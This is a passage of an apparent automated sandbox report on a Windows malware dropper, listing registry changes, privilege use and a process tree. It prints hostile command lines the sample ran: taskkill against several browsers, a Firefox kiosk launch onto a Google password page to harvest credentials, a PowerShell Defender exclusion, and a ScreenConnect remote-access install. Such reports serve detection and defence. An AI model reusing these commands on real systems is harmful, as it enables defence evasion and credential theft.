Modifies data under HKEY_USERS 18 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe -
Modifies registry class 38 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C18BA22B6B7B3C7E6EBC7782C47F56AA msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8D42856C30994BFA4B03410142FF69F8 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8D42856C30994BFA4B03410142FF69F8\Full msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\ProductIcon = "C:\\Windows\\Installer\\{C65824D8-9903-AFB4-B430-141024FF968F}\\DefaultIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (e6cb77284cf765aa)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\Media msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\ = "ScreenConnect Client (e6cb77284cf765aa) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\ProductName = "ScreenConnect Client (e6cb77284cf765aa)" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-e6cb77284cf765aa msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell\open msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C18BA22B6B7B3C7E6EBC7782C47F56AA\8D42856C30994BFA4B03410142FF69F8 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\e6cb77284cf765aa\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings firefox.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\URL Protocol msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\Version = "402784266" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\e6cb77284cf765aa\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-e6cb77284cf765aa\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell\open\command msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\PackageName = "setup.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (e6cb77284cf765aa)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\PackageCode = "8D42856C30994BFA4B03410142FF69F8" msiexec.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5352 document.exe -
Suspicious behavior: EnumeratesProcesses 51 IoCs
pid Process 3776 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 3776 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 4248 skotes.exe 4248 skotes.exe 4356 5480c36033.exe 4356 5480c36033.exe 1364 3beeb94a45.exe 1364 3beeb94a45.exe 4480 skotes.exe 4480 skotes.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 1544 cedfdcc430.exe 1544 cedfdcc430.exe 1544 cedfdcc430.exe 1544 cedfdcc430.exe 1544 cedfdcc430.exe 5352 document.exe 5352 document.exe 5800 powershell.exe 5800 powershell.exe 5800 powershell.exe 3500 powershell.exe 3500 powershell.exe 3500 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe 5352 document.exe 5352 document.exe 4908 msiexec.exe 4908 msiexec.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 5440 skotes.exe 5440 skotes.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 5840 skotes.exe 5840 skotes.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 996 taskkill.exe Token: SeDebugPrivilege 4696 taskkill.exe Token: SeDebugPrivilege 2856 taskkill.exe Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 4400 taskkill.exe Token: SeDebugPrivilege 3932 firefox.exe Token: SeDebugPrivilege 3932 firefox.exe Token: SeDebugPrivilege 1544 cedfdcc430.exe Token: SeDebugPrivilege 5352 document.exe Token: SeDebugPrivilege 5800 powershell.exe Token: SeDebugPrivilege 3500 powershell.exe Token: SeDebugPrivilege 4768 SupportClientSetup.exe Token: SeShutdownPrivilege 5376 msiexec.exe Token: SeIncreaseQuotaPrivilege 5376 msiexec.exe Token: SeSecurityPrivilege 4908 msiexec.exe Token: SeCreateTokenPrivilege 5376 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5376 msiexec.exe Token: SeLockMemoryPrivilege 5376 msiexec.exe Token: SeIncreaseQuotaPrivilege 5376 msiexec.exe Token: SeMachineAccountPrivilege 5376 msiexec.exe Token: SeTcbPrivilege 5376 msiexec.exe Token: SeSecurityPrivilege 5376 msiexec.exe Token: SeTakeOwnershipPrivilege 5376 msiexec.exe Token: SeLoadDriverPrivilege 5376 msiexec.exe Token: SeSystemProfilePrivilege 5376 msiexec.exe Token: SeSystemtimePrivilege 5376 msiexec.exe Token: SeProfSingleProcessPrivilege 5376 msiexec.exe Token: SeIncBasePriorityPrivilege 5376 msiexec.exe Token: SeCreatePagefilePrivilege 5376 msiexec.exe Token: SeCreatePermanentPrivilege 5376 msiexec.exe Token: SeBackupPrivilege 5376 msiexec.exe Token: SeRestorePrivilege 5376 msiexec.exe Token: SeShutdownPrivilege 5376 msiexec.exe Token: SeDebugPrivilege 5376 msiexec.exe Token: SeAuditPrivilege 5376 msiexec.exe Token: SeSystemEnvironmentPrivilege 5376 msiexec.exe Token: SeChangeNotifyPrivilege 5376 msiexec.exe Token: SeRemoteShutdownPrivilege 5376 msiexec.exe Token: SeUndockPrivilege 5376 msiexec.exe Token: SeSyncAgentPrivilege 5376 msiexec.exe Token: SeEnableDelegationPrivilege 5376 msiexec.exe Token: SeManageVolumePrivilege 5376 msiexec.exe Token: SeImpersonatePrivilege 5376 msiexec.exe Token: SeCreateGlobalPrivilege 5376 msiexec.exe Token: SeCreateTokenPrivilege 5376 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5376 msiexec.exe Token: SeLockMemoryPrivilege 5376 msiexec.exe Token: SeIncreaseQuotaPrivilege 5376 msiexec.exe Token: SeMachineAccountPrivilege 5376 msiexec.exe Token: SeTcbPrivilege 5376 msiexec.exe Token: SeSecurityPrivilege 5376 msiexec.exe Token: SeTakeOwnershipPrivilege 5376 msiexec.exe Token: SeLoadDriverPrivilege 5376 msiexec.exe Token: SeSystemProfilePrivilege 5376 msiexec.exe Token: SeSystemtimePrivilege 5376 msiexec.exe Token: SeProfSingleProcessPrivilege 5376 msiexec.exe Token: SeIncBasePriorityPrivilege 5376 msiexec.exe Token: SeCreatePagefilePrivilege 5376 msiexec.exe Token: SeCreatePermanentPrivilege 5376 msiexec.exe Token: SeBackupPrivilege 5376 msiexec.exe Token: SeRestorePrivilege 5376 msiexec.exe Token: SeShutdownPrivilege 5376 msiexec.exe Token: SeDebugPrivilege 5376 msiexec.exe Token: SeAuditPrivilege 5376 msiexec.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 3776 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 5376 msiexec.exe 5376 msiexec.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3932 firefox.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe 3468 88de7f18a5.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3932 firefox.exe 5352 document.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3776 wrote to memory of 4248 3776 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 86 PID 3776 wrote to memory of 4248 3776 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 86 PID 3776 wrote to memory of 4248 3776 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 86 PID 4248 wrote to memory of 4356 4248 skotes.exe 91 PID 4248 wrote to memory of 4356 4248 skotes.exe 91 PID 4248 wrote to memory of 4356 4248 skotes.exe 91 PID 4248 wrote to memory of 1364 4248 skotes.exe 95 PID 4248 wrote to memory of 1364 4248 skotes.exe 95 PID 4248 wrote to memory of 1364 4248 skotes.exe 95 PID 4248 wrote to memory of 3468 4248 skotes.exe 97 PID 4248 wrote to memory of 3468 4248 skotes.exe 97 PID 4248 wrote to memory of 3468 4248 skotes.exe 97 PID 3468 wrote to memory of 996 3468 88de7f18a5.exe 98 PID 3468 wrote to memory of 996 3468 88de7f18a5.exe 98 PID 3468 wrote to memory of 996 3468 88de7f18a5.exe 98 PID 3468 wrote to memory of 4696 3468 88de7f18a5.exe 100 PID 3468 wrote to memory of 4696 3468 88de7f18a5.exe 100 PID 3468 wrote to memory of 4696 3468 88de7f18a5.exe 100 PID 3468 wrote to memory of 2856 3468 88de7f18a5.exe 102 PID 3468 wrote to memory of 2856 3468 88de7f18a5.exe 102 PID 3468 wrote to memory of 2856 3468 88de7f18a5.exe 102 PID 3468 wrote to memory of 1912 3468 88de7f18a5.exe 104 PID 3468 wrote to memory of 1912 3468 88de7f18a5.exe 104 PID 3468 wrote to memory of 1912 3468 88de7f18a5.exe 104 PID 3468 wrote to memory of 4400 3468 88de7f18a5.exe 106 PID 3468 wrote to memory of 4400 3468 88de7f18a5.exe 106 PID 3468 wrote to memory of 4400 3468 88de7f18a5.exe 106 PID 3468 wrote to memory of 2660 3468 88de7f18a5.exe 108 PID 3468 wrote to memory of 2660 3468 88de7f18a5.exe 108 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 2660 wrote to memory of 3932 2660 firefox.exe 109 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 PID 3932 wrote to memory of 2664 3932 firefox.exe 110 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Users\Admin\AppData\Local\Temp\1006867001\5480c36033.exe"C:\Users\Admin\AppData\Local\Temp\1006867001\5480c36033.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4356
-
-
C:\Users\Admin\AppData\Local\Temp\1006868001\3beeb94a45.exe"C:\Users\Admin\AppData\Local\Temp\1006868001\3beeb94a45.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1364
-
-
C:\Users\Admin\AppData\Local\Temp\1006869001\88de7f18a5.exe"C:\Users\Admin\AppData\Local\Temp\1006869001\88de7f18a5.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f03e3381-1927-431a-8d62-9f8ce9f9d797} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" gpu6⤵PID:2664
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2408 -prefMapHandle 2396 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {67b12b54-b285-4976-b247-054932237c31} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" socket6⤵PID:2996
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1600 -childID 1 -isForBrowser -prefsHandle 1608 -prefMapHandle 1576 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3bc7a69-8da9-4e92-a9dc-538a55649980} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" tab6⤵PID:4964
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3824 -childID 2 -isForBrowser -prefsHandle 3512 -prefMapHandle 3196 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fd56ba8-6224-4eff-9c08-35149395ad74} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" tab6⤵PID:2592
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4724 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4736 -prefMapHandle 4820 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97ea9c59-ce1d-4946-93c8-7e97daaa65c8} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" utility6⤵
- Checks processor information in registry
PID:5396
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4980 -childID 3 -isForBrowser -prefsHandle 5564 -prefMapHandle 4844 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4d7c7bb-28b6-41f5-9a51-bdfccee40555} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" tab6⤵PID:4400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 4 -isForBrowser -prefsHandle 5744 -prefMapHandle 5752 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0b2b389-f21c-4558-bbcf-3d92df6f95b3} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" tab6⤵PID:1012
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4992 -childID 5 -isForBrowser -prefsHandle 5908 -prefMapHandle 5912 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fb47717-ed13-4828-b85f-08f8883d4646} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" tab6⤵PID:3332
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1006870001\cedfdcc430.exe"C:\Users\Admin\AppData\Local\Temp\1006870001\cedfdcc430.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe"C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe'4⤵
- Command and Scripting Interpreter: PowerShell
